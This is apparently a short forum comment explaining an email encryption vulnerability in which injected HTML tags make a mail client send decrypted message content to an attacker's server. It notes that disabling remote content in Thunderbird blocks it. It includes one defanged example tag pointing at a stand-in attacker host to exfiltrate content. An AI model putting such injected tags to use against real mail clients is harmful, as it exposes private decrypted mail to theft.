Because the vulnerability is just about adding HTML tags which will send decrypted content to a remote server controlled by attacker.
Example :
<img hxxp://hacker-server.com/--ENCRYPED CONTENT HERE--
If you disable remote content, it can't be exploited on thunderbird (which is disabled by default) BUT there may be other attack vector on other software/email client.
Anyway, the attacker still need to get a hand on your encrypted email.